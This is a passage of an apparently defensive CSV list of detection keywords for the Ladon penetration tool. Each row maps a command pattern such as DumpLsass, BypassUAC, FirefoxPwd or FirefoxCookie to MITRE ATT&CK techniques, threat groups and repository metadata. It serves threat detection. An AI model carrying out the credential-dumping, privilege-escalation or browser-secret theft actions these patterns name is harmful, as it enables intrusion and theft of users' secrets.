APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon BadPotato*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon BypassUAC*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon CheckDoor*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon Clslog*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon CmdDll *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon cmdline*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon CVE-*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon DirList*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon DraytekExp*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon DumpLsass*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon EnableDotNet*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon EnumProcess*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon EnumShare*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon Exploit*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FindIP *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FirefoxCookie*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FirefoxHistory*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FirefoxPwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ForExec *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FtpDownLoad *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FtpServer *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 